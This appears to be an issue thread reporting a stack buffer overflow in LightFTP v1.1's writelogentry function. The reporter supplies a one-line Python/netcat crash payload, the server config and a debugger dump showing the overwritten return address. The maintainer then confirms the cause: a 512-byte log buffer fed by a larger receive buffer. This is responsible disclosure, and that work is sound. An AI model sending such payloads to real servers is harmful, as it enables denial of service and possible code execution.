Security - buffer overflow

[jacksonfylle]

Hello,

I've noticed a buffer overflow in the Unix version of LightFTP v1.1.
This append in the "writelogentry" function.

With this payload :
python -c 'print "USER anonymous\nPASS anonymous\n" + "A"*499 + "B"*10 + "\x0D\x0A" ' | nc 127.0.0.1 9999

With this configuration :

[ftpconfig]
port=9999
maxusers=1
interface=127.0.0.1
external_ip=127.0.0.1
local_mask=255.255.255.0
minport=6000
maxport=6999
logfilepath=./fftplog

[anonymous]
pswd=anonymous
accs=readonly
root=./ano

[uploader]
pswd=*
accs=upload
root=./up

[ftpadmin]
pswd=*
accs=admin
root=./adm

POC :

0x5649328723ed  <writelogentry+1805>  ret    ← $pc                                                                                                    
0x5649328723ee  <writelogentry+1806>  xchg ax, ax                                                                                                     
0x5649328723f0  <writelogentry+1808>  mov r8d, 0x30                                                                                                   
0x5649328723f6  <writelogentry+1814>  mov WORD PTR [r14+rdx*1+0x1], r8w                                                                               
0x5649328723fc  <writelogentry+1820>  jmp 0x564932872169 <writelogentry+1161>                                                                         
0x564932872401  <writelogentry+1825>  nop DWORD PTR [rax+0x0]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:../ftpserv.c+440 ]───$
 436     
 437            strcat(_text, CRLF);
 438     
 439            return writeconsolestr(_text);
 440     }                ←  $pc
 441
 442     void WorkerThreadCleanup(PFTPCONTEXT context)
 443     {
 444            struct timespec         waitinterval;
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]───$
[#0] Id 3, Name: "fftp", stopped, reason: SINGLE STEP
[#1] Id 2, Name: "fftp", stopped, reason: SINGLE STEP
[#2] Id 1, Name: "fftp", stopped, reason: SINGLE STEP
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]───$
[#0] RetAddr: 0x5649328723ed, Name: writelogentry(context=<optimized out>, logtext1=<optimized out>, logtext2=<optimized out>)
[#1] RetAddr: 0x4141414141414141
[#2] RetAddr: 0x4242414141414141
[#3] RetAddr: 0x4242424242424242
[#4] RetAddr: 0xa0d
[#5] RetAddr: 0x7f6e940009c0
[#6] RetAddr: 0x7f6e99abee84
[#7] RetAddr: 0x7f6e99abeea0
[#8] RetAddr: 0x10000000a
[#9] RetAddr: 0x0
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────$
0x00005649328723ed      440     }
gef➤  x/10gx $rsp
0x7f6e99abee48: 0x4141414141414141      0x4242414141414141

This buffer overflow can lead to remote code execution or a denial of service.
I hope this will help you to fix the vuln.

[hfiref0x]

Hello,

thanks for reporting this bug. The recv buffer rcvbuf in ftp_client_thread routine limited to PATH_MAX * 2, but internal buffer _text in writelogentry is only 512 chars, resulting in buffer overflow as you pointed.